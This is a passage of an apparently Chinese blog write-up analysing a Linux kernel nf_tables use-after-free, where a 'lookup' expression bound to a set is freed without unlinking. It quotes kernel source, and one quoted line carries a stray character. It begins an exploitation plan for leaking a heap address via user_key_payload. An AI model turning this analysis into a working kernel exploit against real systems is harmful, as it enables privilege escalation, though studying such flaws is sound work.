chain = nft_chain_lookup(net, table, nla[NFTA_RULE_CHAIN], genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
return PTR_ERR(chain);
}

if (nla[NFTA_RULE_HANDLE]) {
handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_HANDLE]));
rule = __nft_rule_lookup(chain, handle);
if (IS_ERR(rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return PTR_ERR(rule);
}

if (nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return -EEXIST;
}
if (nlh->nlmsg_flags & NLM_F_REPLACE)
old_rule = rule;
else
return -EOPNOTSUPP;
} else {
if (!(nlh->nlmsg_flags & NLM_F_CREATE) ||
nlh->nlmsg_flags & NLM_F_REPLACE)
return -EINVAL;
handle = nf_tables_alloc_handle(table);

if (chain->use == UINT_MAX)
return -EOVERFLOW;

if (nla[NFTA_RULE_POSITION]) {
pos_handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_POSITION]));
old_rule = __nft_rule_lookup(chain, pos_handle);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION]);
return PTR_ERR(old_rule);
}
} else if (nla[NFTA_RULE_POSITION_ID]) {
old_rule = nft_rule_lookup_byid(net, nla[NFTA_RULE_POSITION_ID]);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION_ID]);
return PTR_ERR(old_rule);
}
}
}

nft_ctx_init(&ctx, net, skb, nlh, family, table, chain, nla);

n = 0;
size = 0;
if (nla[NFTA_RULE_EXPRESSIONS]) {
info = kvmalloc_array(NFT_RULE_MAXEXPRS,
sizeof(struct nft_expr_info),
GFP_KERNEL);
if (!info)
return -ENOMEM;

nla_for_each_nested(tmp, nla[NFTA_RULE_EXPRESSIONS], rem) {
err = -EINVAL;
if (nla_type(tmp) != NFTA_LIST_ELEM)
goto err1;
if (n == NFT_RULE_MAXEXPRS)
goto err1;
err = nf_tables_expr_parse(&ctx, tmp, &info[n]);
if (err < 0)
goto err1;
size += info[n].ops->size;
n++;
}
}
/* Check for overflow of dlen field */
err = -EFBIG;
if (size >= 1 << 12)
goto err1;

if (nla[NFTA_RULE_USERDATA]) {
ulen = nla_len(nla[NFTA_RULE_USERDATA]);
if (ulen > 0)
usize = sizeof(struct nft_userdata) + ulen;
}

err = -ENOMEM;
rule = kzalloc(sizeof(*rule) + size + usize, GFP_KERNEL);
if (rule == NULL)
goto err1;

nft_activate_next(net, rule);

rule->handle = handle;
rule->dlen = size;
rule->udata = ulen ? 1 : 0;

if (ulen) {
udata = nft_userdata(rule);
udata->len = ulen - 1;
nla_memcpy(udata->data, nla[NFTA_RULE_USERDATA], ulen);
}

expr = nft_expr_first(rule);
for (i = 0; i < n; i++) {
err = nf_tables_newexpr(&ctx, &info[i], expr);
if (err < 0)
goto err2;

if (info[i].ops->validate)
nft_validate_state_update(net, NFT_VALIDATE_NEED);

info[i].ops = NULL;
expr = nft_expr_next(expr);
}

if (nlh->nlmsg_flags & NLM_F_REPLACE) {
trans = nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule);
if (trans == NULL) {
err = -ENOMEM;
goto err2;
}
err = nft_delrule(&ctx, old_rule);
if (err < 0) {
nft_trans_destroy(trans);
goto err2;
}

list_add_tail_rcu(&rule->list, &old_rule->list);
} else {
if (nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule) == NULL) {
err = -ENOMEM;
goto err2;
}

if (nlh->nlmsg_flags & NLM_F_APPEND) {
if (old_rule)
list_add_rcu(&rule->list, &old_rule->list);
else
list_add_tail_rcu(&rule->list, &chain->rules);
} else {
if (old_rule)
list_add_tail_rcu(&rule->list, &old_rule->list);
else
list_add_rcu(&rule->list, &chain->rules);
}
}
kvfree(info);
chain->use++;

if (net->nft.validate_state == NFT_VALIDATE_DO)
return nft_table_validate(net, table);

return 0;
err2:
nf_tables_rule_release(&ctx, rule);
err1:
for (i = 0; i < n; i++) {
if (info[i].ops) {
module_put(info[i].ops->type->owner);
if (info[i].ops->type->release_ops)
info[i].ops->type->release_ops(info[i].ops);
}
}
kvfree(info);
return err;
}

首先前两步就是获取table和chain。若是设置了nla[NFTA_RULE_EXPRESSIONS],则遍历其中所有的expression,把每个expression的大小(info[n].ops->size)累加到size中。若是设置了nla[NFTA_RULE_USERDATA],则把userdata的长度加上struct nft_userdata头部的大小放到usize中。

rule = kzalloc(sizeof(*rule) + size + usize, GFP_KERNEL);随即调用这条语句分配rule,紧接着就是一系列初始化。

创建expression操作

创建expression的操作其实也是发生在nf_tables_newrule函数中的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
if (nla[NFTA_RULE_EXPRESSIONS]) {
info = kvmalloc_array(NFT_RULE_MAXEXPRS,
sizeof(struct nft_expr_info),
GFP_KERNEL);
if (!info)
return -ENOMEM;

nla_for_each_nested(tmp, nla[NFTA_RULE_EXPRESSIONS], rem) {
err = -EINVAL;
if (nla_type(tmp) != NFTA_LIST_ELEM)
goto err1;
if (n == NFT_RULE_MAXEXPRS)
goto err1;
err = nf_tables_expr_parse(&ctx, tmp, &info[n]);
if (err < 0)
goto err1;
size += info[n].ops->size;
n++;
}
}

首先是在这里通过nf_tables_expr_parse初始化info为某个type的ops。

1
2
3
4
5
6
7
8
9
10
11
12
/*
 * Look up an expression type by name.
 * Walks the nf_tables_expressions list and returns the first type whose name
 * equals the string attribute @nla and which either has no family set
 * (type->family == 0) or matches @family. Returns NULL if nothing matches.
 */
static const struct nft_expr_type *__nft_expr_type_get(u8 family,
struct nlattr *nla)
{
const struct nft_expr_type *type;

list_for_each_entry(type, &nf_tables_expressions, list) {
/* nla_strcmp() returns 0 on equality, hence the negation */
if (!nla_strcmp(nla, type->name) &&
(!type->family || type->family == family))
return type;
}
return NULL;
}

nf_tables_expr_parse最终会调用到__nft_expr_type_get随后遍历nf_tables_expressions,找到对应的type

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
 * Netfilter protocol family identifiers (NFPROTO_*). The values are sparse;
 * NFPROTO_NUMPROTO follows the last explicit value (12) and is therefore 13.
 */
enum {
NFPROTO_UNSPEC = 0,
NFPROTO_INET = 1,
NFPROTO_IPV4 = 2,
NFPROTO_ARP = 3,
NFPROTO_NETDEV = 5,
NFPROTO_BRIDGE = 7,
NFPROTO_IPV6 = 10,
NFPROTO_DECNET = 12,
NFPROTO_NUMPROTO,
};

/*
 * Table of pointers to expression type descriptors (immediate, cmp, lookup,
 * bitwise, ...).
 * NOTE(review): presumably these are the built-in types registered onto
 * nf_tables_expressions at init time - the registration code is not shown
 * here, confirm against the kernel source.
 */
static struct nft_expr_type *nft_basic_types[] = {
&nft_imm_type,
&nft_cmp_type,
&nft_lookup_type,
&nft_bitwise_type,
&nft_byteorder_type,
&nft_payload_type,
&nft_dynset_type,
&nft_range_type,
&nft_meta_type,
&nft_rt_type,
&nft_exthdr_type,
&nft_last_type,
};

所以根据上面的例子看,这里会调用到的是nft_lookup_type

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/*
 * Operations of the "lookup" expression. nf_tables_newexpr() calls .init
 * (nft_lookup_init) when the expression is created; .size is the per-instance
 * size that nf_tables_newrule() adds up when sizing a rule.
 */
static const struct nft_expr_ops nft_lookup_ops = {
.type = &nft_lookup_type,
.size = NFT_EXPR_SIZE(sizeof(struct nft_lookup)),
.eval = nft_lookup_eval,
.init = nft_lookup_init,
.activate = nft_lookup_activate,
.deactivate = nft_lookup_deactivate,
.destroy = nft_lookup_destroy,
.dump = nft_lookup_dump,
.validate = nft_lookup_validate,
};

/*
 * Type descriptor for the expression named "lookup". No .family and no
 * .flags are set in this initializer, so both are zero here.
 */
struct nft_expr_type nft_lookup_type __read_mostly = {
.name = "lookup",
.ops = &nft_lookup_ops,
.policy = nft_lookup_policy,
.maxattr = NFTA_LOOKUP_MAX,
.owner = THIS_MODULE,
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/*
 * Initialise @expr in place from the parsed description @info.
 * Sets expr->ops and, when the ops provide one, calls ->init() with the
 * parsed attributes in info->tb. Returns 0 on success; on init failure
 * expr->ops is reset to NULL and the negative error is returned.
 */
static int nf_tables_newexpr(const struct nft_ctx *ctx,
const struct nft_expr_info *info,
struct nft_expr *expr)
{
const struct nft_expr_ops *ops = info->ops;
int err;

expr->ops = ops;
/* type-specific initialisation, e.g. nft_lookup_init for "lookup" */
if (ops->init) {
err = ops->init(ctx, expr, (const struct nlattr **)info->tb);
if (err < 0)
goto err1;
}

return 0;
err1:
expr->ops = NULL;
return err;
}

最终根据不同类型进行初始化。

漏洞分析

漏洞发生在创建set的过程中。注意下面nf_tables_newset的代码与前面几个函数引用的内核版本不同:回调的参数变成了struct nfnl_info,nft_table_lookup也多了一个portid参数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr *const nla[])
{
u32 ktype, dtype, flags, policy, gc_int, objtype;
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
const struct nft_set_ops *ops;
struct nft_expr *expr = NULL;
struct net *net = info->net;
struct nft_set_desc desc;
struct nft_table *table;
unsigned char *udata;
struct nft_set *set;
struct nft_ctx ctx;
size_t alloc_size;
u64 timeout;
char *name;
int err, i;
u16 udlen;
u64 size;

if (nla[NFTA_SET_TABLE] == NULL || nla[NFTA_SET_NAME] == NULL ||
nla[NFTA_SET_KEY_LEN] == NULL || nla[NFTA_SET_ID] == NULL)
return -EINVAL;

memset(&desc, 0, sizeof(desc));

ktype = NFT_DATA_VALUE;
if (nla[NFTA_SET_KEY_TYPE] != NULL) {
ktype = ntohl(nla_get_be32(nla[NFTA_SET_KEY_TYPE]));
if ((ktype & NFT_DATA_RESERVED_MASK) == NFT_DATA_RESERVED_MASK)
return -EINVAL;
}

desc.klen = ntohl(nla_get_be32(nla[NFTA_SET_KEY_LEN]));
if (desc.klen == 0 || desc.klen > NFT_DATA_VALUE_MAXLEN)
return -EINVAL;

flags = 0;
if (nla[NFTA_SET_FLAGS] != NULL) {
flags = ntohl(nla_get_be32(nla[NFTA_SET_FLAGS]));
if (flags &
~(NFT_SET_ANONYMOUS | NFT_SET_CONSTANT | NFT_SET_INTERVAL |
NFT_SET_TIMEOUT | NFT_SET_MAP | NFT_SET_EVAL |
NFT_SET_OBJECT | NFT_SET_CONCAT | NFT_SET_EXPR))
return -EOPNOTSUPP;
/* Only one of these operations is supported */
if ((flags & (NFT_SET_MAP | NFT_SET_OBJECT)) ==
(NFT_SET_MAP | NFT_SET_OBJECT))
return -EOPNOTSUPP;
if ((flags & (NFT_SET_EVAL | NFT_SET_OBJECT)) ==
(NFT_SET_EVAL | NFT_SET_OBJECT))
return -EOPNOTSUPP;
}

dtype = 0;
if (nla[NFTA_SET_DATA_TYPE] != NULL) {
if (!(flags & NFT_SET_MAP))
return -EINVAL;

dtype = ntohl(nla_get_be32(nla[NFTA_SET_DATA_TYPE]));
if ((dtype & NFT_DATA_RESERVED_MASK) ==
NFT_DATA_RESERVED_MASK &&
dtype != NFT_DATA_VERDICT)
return -EINVAL;

if (dtype != NFT_DATA_VERDICT) {
if (nla[NFTA_SET_DATA_LEN] == NULL)
return -EINVAL;
desc.dlen = ntohl(nla_get_be32(nla[NFTA_SET_DATA_LEN]));
if (desc.dlen == 0 || desc.dlen > NFT_DATA_VALUE_MAXLEN)
return -EINVAL;
} else
desc.dlen = sizeof(struct nft_verdict);
} else if (flags & NFT_SET_MAP)
return -EINVAL;

if (nla[NFTA_SET_OBJ_TYPE] != NULL) {
if (!(flags & NFT_SET_OBJECT))
return -EINVAL;

objtype = ntohl(nla_get_be32(nla[NFTA_SET_OBJ_TYPE]));
if (objtype == NFT_OBJECT_UNSPEC || objtype > NFT_OBJECT_MAX)
return -EOPNOTSUPP;
} else if (flags & NFT_SET_OBJECT)
return -EINVAL;
else
objtype = NFT_OBJECT_UNSPEC;

timeout = 0;
if (nla[NFTA_SET_TIMEOUT] != NULL) {
if (!(flags & NFT_SET_TIMEOUT))
return -EINVAL;

err = nf_msecs_to_jiffies64(nla[NFTA_SET_TIMEOUT], &timeout);
if (err)
return err;
}
gc_int = 0;
if (nla[NFTA_SET_GC_INTERVAL] != NULL) {
if (!(flags & NFT_SET_TIMEOUT))
return -EINVAL;
gc_int = ntohl(nla_get_be32(nla[NFTA_SET_GC_INTERVAL]));
}

policy = NFT_SET_POL_PERFORMANCE;
if (nla[NFTA_SET_POLICY] != NULL)
policy = ntohl(nla_get_be32(nla[NFTA_SET_POLICY]));

if (nla[NFTA_SET_DESC] != NULL) {
err = nf_tables_set_desc_parse(&desc, nla[NFTA_SET_DESC]);
if (err < 0)
return err;
}

if (nla[NFTA_SET_EXPR] || nla[NFTA_SET_EXPRESSIONS])
desc.expr = true;

table = nft_table_lookup(net, nla[NFTA_SET_TABLE], family, genmask,
NETLINK_CB(skb).portid);
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_SET_TABLE]);
return PTR_ERR(table);
}

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);

set = nft_set_lookup(table, nla[NFTA_SET_NAME], genmask);
if (IS_ERR(set)) {
if (PTR_ERR(set) != -ENOENT) {
NL_SET_BAD_ATTR(extack, nla[NFTA_SET_NAME]);
return PTR_ERR(set);
}
} else {
if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_SET_NAME]);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

return 0;
}

if (!(info->nlh->nlmsg_flags & NLM_F_CREATE))
return -ENOENT;

ops = nft_select_set_ops(&ctx, nla, &desc, policy);
if (IS_ERR(ops))
return PTR_ERR(ops);

udlen = 0;
if (nla[NFTA_SET_USERDATA])
udlen = nla_len(nla[NFTA_SET_USERDATA]);

size = 0;
if (ops->privsize != NULL)
size = ops->privsize(nla, &desc);
alloc_size = sizeof(*set) + size + udlen;
if (alloc_size < size || alloc_size > INT_MAX)
return -ENOMEM;
set = kvzalloc(alloc_size, GFP_KERNEL);
if (!set)
return -ENOMEM;

name = nla_strdup(nla[NFTA_SET_NAME], GFP_KERNEL);
if (!name) {
err = -ENOMEM;
goto err_set_name;
}

err = nf_tables_set_alloc_name(&ctx, set, name);
kfree(name);
if (err < 0)
goto err_set_name;

udata = NULL;
if (udlen) {
udata = set->data + size;
nla_memcpy(udata, nla[NFTA_SET_USERDATA], udlen);
}

INIT_LIST_HEAD(&set->bindings);
INIT_LIST_HEAD(&set->catchall_list);
set->table = table;
write_pnet(&set->net, net);
set->ops = ops;
set->ktype = ktype;
set->klen = desc.klen;
set->dtype = dtype;
set->objtype = objtype;
set->dlen = desc.dlen;
set->flags = flags;
set->size = desc.size;
set->policy = policy;
set->udlen = udlen;
set->udata = udata;
set->timeout = timeout;
set->gc_int = gc_int;

set->field_count = desc.field_count;
for (i = 0; i < desc.field_count; i++)
set->field_len[i] = desc.field_len[i];

err = ops->init(set, &desc, nla);
if (err < 0)
goto err_set_init;

if (nla[NFTA_SET_EXPR]) {
expr = nft_set_elem_expr_alloc(&ctx, set, nla[NFTA_SET_EXPR]);
if (IS_ERR(expr)) {
err = PTR_ERR(expr);
goto err_set_expr_alloc;
}
set->exprs[0] = expr;
set->num_exprs++;
} else if (nla[NFTA_SET_EXPRESSIONS]) {
struct nft_expr *expr;
struct nlattr *tmp;
int left;

if (!(flags & NFT_SET_EXPR)) {
err = -EINVAL;
goto err_set_expr_alloc;
}
i = 0;
nla_for_each_nested (tmp, nla[NFTA_SET_EXPRESSIONS], left) {
if (i == NFT_SET_EXPR_MAX) {
err = -E2BIG;
goto err_set_expr_alloc;
}
if (nla_type(tmp) != NFTA_LIST_ELEM) {
err = -EINVAL;
goto err_set_expr_alloc;
}
expr = nft_set_elem_expr_alloc(&ctx, set, tmp);
if (IS_ERR(expr)) {
err = PTR_ERR(expr);
goto err_set_expr_alloc;
}
set->exprs[i++] = expr;
set->num_exprs++;
}
}

set->handle = nf_tables_alloc_handle(table);

err = nft_trans_set_add(&ctx, NFT_MSG_NEWSET, set);
if (err < 0)
goto err_set_expr_alloc;

list_add_tail_rcu(&set->list, &table->sets);
table->use++;
return 0;

err_set_expr_alloc:
for (i = 0; i < set->num_exprs; i++)
nft_expr_destroy(&ctx, set->exprs[i]);

ops->destroy(set);
err_set_init:
kfree(set->name);
err_set_name:
kvfree(set);
return err;
}

上半部分处理set的跟漏洞关系不大,主要关注下面生成expression的过程,这里使用了nft_set_elem_expr_alloc函数进行申请。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
const struct nft_set *set,
const struct nlattr *attr)
{
struct nft_expr *expr;
int err;e

expr = nft_expr_init(ctx, attr);
if (IS_ERR(expr))
return expr;

err = -EOPNOTSUPP;
if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
goto err_set_elem_expr;

if (expr->ops->type->flags & NFT_EXPR_GC) {
if (set->flags & NFT_SET_TIMEOUT)
goto err_set_elem_expr;
if (!set->ops->gc_init)
goto err_set_elem_expr;
set->ops->gc_init(set);
}

return expr;

err_set_elem_expr:
nft_expr_destroy(ctx, expr);
return ERR_PTR(err);
}

在函数开头就调用了nft_expr_init进行初始化。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/*
 * Parse the netlink attribute @nla into an expression description, allocate
 * a zeroed object of expr_info.ops->size bytes and hand both to
 * nf_tables_newexpr().
 *
 * Returns the new expression, or an ERR_PTR() holding a negative errno.
 */
static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
const struct nlattr *nla)
{
struct nft_expr_info expr_info;
struct nft_expr *expr;
struct module *owner;
int err;

err = nf_tables_expr_parse(ctx, nla, &expr_info);
if (err < 0)
goto err_expr_parse;

/* Expression types without NFT_EXPR_STATEFUL are refused before allocating. */
err = -EOPNOTSUPP;
if (!(expr_info.ops->type->flags & NFT_EXPR_STATEFUL))
goto err_expr_stateful;

err = -ENOMEM;
expr = kzalloc(expr_info.ops->size, GFP_KERNEL);
if (expr == NULL)
goto err_expr_stateful;

err = nf_tables_newexpr(ctx, &expr_info, expr);
if (err < 0)
goto err_expr_new;

return expr;
err_expr_new:
kfree(expr);
err_expr_stateful:
/* Read the owner first: release_ops() is handed the ops it was read from. */
owner = expr_info.ops->type->owner;
if (expr_info.ops->type->release_ops)
expr_info.ops->type->release_ops(expr_info.ops);

module_put(owner);
err_expr_parse:
return ERR_PTR(err);
}

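可以看到这里就出现了我们比较熟悉的两个函数:nf_tables_expr_parse 和 nf_tables_newexpr。需要注意的是,上面贴出的 nft_expr_init 中已经带有对 NFT_EXPR_STATEFUL 的检查,这应当是打过补丁之后的版本;在存在漏洞的版本中 nft_expr_init 内没有这一检查,expr 会先经过 nf_tables_newexpr 完成初始化,之后才在 nft_set_elem_expr_alloc 中被检查并销毁。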

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
struct nft_expr {
const struct nft_expr_ops *ops;
unsigned char data[]
__attribute__((aligned(__alignof__(u64))));
};

static inline void *nft_expr_priv(const struct nft_expr *expr)
{
return (void *)expr->data;
}

/*
 * Initialise a "lookup" expression from its netlink attributes.
 *
 * NFTA_LOOKUP_SET and NFTA_LOOKUP_SREG are mandatory.  The referenced set is
 * resolved, the source (and, for maps, destination) register is validated,
 * and finally the expression's private binding is attached to the set via
 * nf_tables_bind_set().
 *
 * Returns 0 on success or a negative errno.
 */
static int nft_lookup_init(const struct nft_ctx *ctx,
const struct nft_expr *expr,
const struct nlattr * const tb[])
{
struct nft_lookup *priv = nft_expr_priv(expr);
u8 genmask = nft_genmask_next(ctx->net);
struct nft_set *set;
u32 flags;
int err;

if (tb[NFTA_LOOKUP_SET] == NULL ||
tb[NFTA_LOOKUP_SREG] == NULL)
return -EINVAL;

set = nft_set_lookup_global(ctx->net, ctx->table, tb[NFTA_LOOKUP_SET],
tb[NFTA_LOOKUP_SET_ID], genmask);
if (IS_ERR(set))
return PTR_ERR(set);

err = nft_parse_register_load(tb[NFTA_LOOKUP_SREG], &priv->sreg,
set->klen);
if (err < 0)
return err;

if (tb[NFTA_LOOKUP_FLAGS]) {
flags = ntohl(nla_get_be32(tb[NFTA_LOOKUP_FLAGS]));

/* NFT_LOOKUP_F_INV is the only flag accepted here. */
if (flags & ~NFT_LOOKUP_F_INV)
return -EINVAL;

if (flags & NFT_LOOKUP_F_INV) {
/* Inverted lookups are rejected for maps. */
if (set->flags & NFT_SET_MAP)
return -EINVAL;
priv->invert = true;
}
}

/* A destination register must be given exactly when the set is a map. */
if (tb[NFTA_LOOKUP_DREG] != NULL) {
if (priv->invert)
return -EINVAL;
if (!(set->flags & NFT_SET_MAP))
return -EINVAL;

err = nft_parse_register_store(ctx, tb[NFTA_LOOKUP_DREG],
&priv->dreg, NULL, set->dtype,
set->dlen);
if (err < 0)
return err;
} else if (set->flags & NFT_SET_MAP)
return -EINVAL;

priv->binding.flags = set->flags & NFT_SET_MAP;

/* Attaches priv->binding, which lives inside this expression, to the set. */
err = nf_tables_bind_set(ctx, set, &priv->binding);
if (err < 0)
return err;

priv->set = set;
return 0;
}

按照上面的分析此时就该调用nft_lookup_init函数了,这里主要需要注意的是最后一步操作,就是将priv绑定到set上。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
  static inline void __list_add_rcu(struct list_head *new,
struct list_head *prev, struct list_head *next)
{
if (!__list_add_valid(new, prev, next))
return;

new->next = next;
new->prev = prev;
rcu_assign_pointer(list_next_rcu(prev), new);
next->prev = new;
}

static inline void list_add_tail_rcu(struct list_head *new,
struct list_head *head)
{
__list_add_rcu(new, head->prev, head);
}

/* One user of a set; nf_tables_bind_set() links it into set->bindings. */
struct nft_set_binding {
/* Node in the set's bindings list. */
struct list_head list;
/* Set to ctx->chain when the binding is attached. */
const struct nft_chain *chain;
/* nft_lookup_init() stores the set's NFT_SET_MAP bit here. */
u32 flags;
};

/*
 * Private data of a "lookup" expression, stored in nft_expr::data.
 * NOTE(review): on a 64-bit build binding.list.next presumably sits 0x10
 * bytes into this struct, i.e. 0x18 bytes into the enclosing nft_expr --
 * confirm against the actual build.
 */
struct nft_lookup {
/* Set being looked up; assigned at the end of nft_lookup_init(). */
struct nft_set *set;
/* Source register. */
u8 sreg;
/* Destination register, parsed only when NFTA_LOOKUP_DREG is supplied. */
u8 dreg;
/* True when NFT_LOOKUP_F_INV was requested. */
bool invert;
/* Embedded list node that gets linked into set->bindings. */
struct nft_set_binding binding;
};

/*
 * Attach @binding to @set.
 *
 * Fails with -EOVERFLOW when the use counter is saturated and with -EBUSY
 * when an anonymous set already has a binding.  For map bindings the set
 * elements are walked and checked first, unless a map binding for the same
 * chain already exists.
 *
 * On success @binding is appended to set->bindings and set->use is
 * incremented.  Returns 0 or a negative errno.
 */
int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
struct nft_set_binding *binding)
{
struct nft_set_binding *i;
struct nft_set_iter iter;

if (set->use == UINT_MAX)
return -EOVERFLOW;

if (!list_empty(&set->bindings) && nft_set_is_anonymous(set))
return -EBUSY;

if (binding->flags & NFT_SET_MAP) {
/* If the set is already bound to the same chain all
* jumps are already validated for that chain.
*/
list_for_each_entry (i, &set->bindings, list) {
if (i->flags & NFT_SET_MAP &&
i->chain == binding->chain)
goto bind;
}

iter.genmask = nft_genmask_next(ctx->net);
iter.skip = 0;
iter.count = 0;
iter.err = 0;
iter.fn = nf_tables_bind_check_setelem;

set->ops->walk(ctx, set, &iter);
if (!iter.err)
iter.err = nft_set_catchall_bind_check(ctx, set);

if (iter.err < 0)
return iter.err;
}
bind:
binding->chain = ctx->chain;
/* From here on the set's list holds a pointer to the caller's binding. */
list_add_tail_rcu(&binding->list, &set->bindings);
nft_set_trans_bind(ctx, set);
set->use++;

return 0;
}

回到nft_set_elem_expr_alloc函数中,若是我们控制执行流走向err_set_elem_expr分支,即可销毁expr。

if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL)) 这个条件满足时会进入到err_set_elem_expr分支中,而我们使用的lookup这个type恰好没有设置该标识位。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/*
 * Destroy @set only when its bindings list is empty and the set is
 * anonymous; in every other case nothing happens.
 */
void nf_tables_destroy_set(const struct nft_ctx *ctx, struct nft_set *set)
{
if (list_empty(&set->bindings) && nft_set_is_anonymous(set))
nft_set_destroy(ctx, set);
}

/*
 * Destroy callback of the "lookup" expression.
 *
 * It only forwards the referenced set to nf_tables_destroy_set(); the
 * expression's own binding is not removed from set->bindings here.
 */
static void nft_lookup_destroy(const struct nft_ctx *ctx,
const struct nft_expr *expr)
{
struct nft_lookup *priv = nft_expr_priv(expr);

nf_tables_destroy_set(ctx, priv->set);
}

/*
 * Run the expression's optional destroy callback, then drop the module
 * reference of its type.  The expression memory itself is not freed here.
 */
static void nf_tables_expr_destroy(const struct nft_ctx *ctx,
struct nft_expr *expr)
{
/* Fetched up front so the type is still at hand after destroy() ran. */
const struct nft_expr_type *type = expr->ops->type;

if (expr->ops->destroy)
expr->ops->destroy(ctx, expr);
module_put(type->owner);
}

/* Tear down @expr through nf_tables_expr_destroy() and free its memory. */
void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
{
nf_tables_expr_destroy(ctx, expr);
kfree(expr);
}

根据这里的调用关系可以看到,其实最终实现的就只是单单kfree了个expr,而并没有脱链之类的操作,那么此时就发生了UAF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
static const struct nft_expr_ops nft_lookup_ops = {
.type = &nft_lookup_type,
.size = NFT_EXPR_SIZE(sizeof(struct nft_lookup)),
.eval = nft_lookup_eval,
.init = nft_lookup_init,
.activate = nft_lookup_activate,
.deactivate = nft_lookup_deactivate,
.destroy = nft_lookup_destroy,
.dump = nft_lookup_dump,
.validate = nft_lookup_validate,
.reduce = nft_lookup_reduce,
};

struct nft_expr_type nft_lookup_type __read_mostly = {
.name = "lookup",
.ops = &nft_lookup_ops,
.policy = nft_lookup_policy,
.maxattr = NFTA_LOOKUP_MAX,
.owner = THIS_MODULE,
};

然而lookup这个expr的type恰好没有设置flags,也就不带NFT_EXPR_STATEFUL标识位。

漏洞利用

泄漏堆地址

其实上述漏洞存在很大的局限性,在触发到UAF之后,唯一能做到的一件事就是把已释放expr中的 ((struct nft_lookup *)expr->data)->binding.list.next 指针改写为指向新生成的new_expr(中的binding.list)。

expr = kzalloc(expr_info.ops->size, GFP_KERNEL);在上一篇文章提到了内核内存隔离这一说,因为标识位的不同导致无法使用很多已有结构体。

1
2
3
4
5
/*
 * Payload of a "user" key: a header followed by the caller-supplied bytes.
 * NOTE(review): on a 64-bit build data[] presumably starts at offset 0x18
 * (16-byte rcu_head, 2-byte datalen, padding to 8) -- confirm.
 */
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[] __aligned(__alignof__(u64)); /* actual data */
};

上面next指针的偏移正好为0x18而这里的data数组是用户可控,那么可以通过触发uaf之后泄漏出堆地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
int user_preparse(struct key_preparsed_payload *prep)
{
struct user_key_payload *upayload;
size_t datalen = prep->datalen;

if (datalen <= 0 || datalen > 32767 || !prep->data)
return -EINVAL;

upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);
if (!upayload)
return -ENOMEM;

/* attach the data */
prep->quotalen = datalen;
prep->payload.data[0] = upayload;
upayload->datalen = datalen;
memcpy(upayload->data, prep->data, datalen);
return 0;
}
EXPORT_SYMBOL_GPL(user_preparse);

